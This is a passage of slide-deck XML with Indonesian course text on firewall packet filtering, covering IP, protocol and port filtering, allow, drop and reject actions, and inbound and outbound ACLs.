              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bit dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>ID/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UDP. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diagnostik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet Control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>MessageProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ICMP) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pengamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port TCP/UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lewat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tindakan drop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> deny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diam-diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tindakan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ICMP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijangkau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyaring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
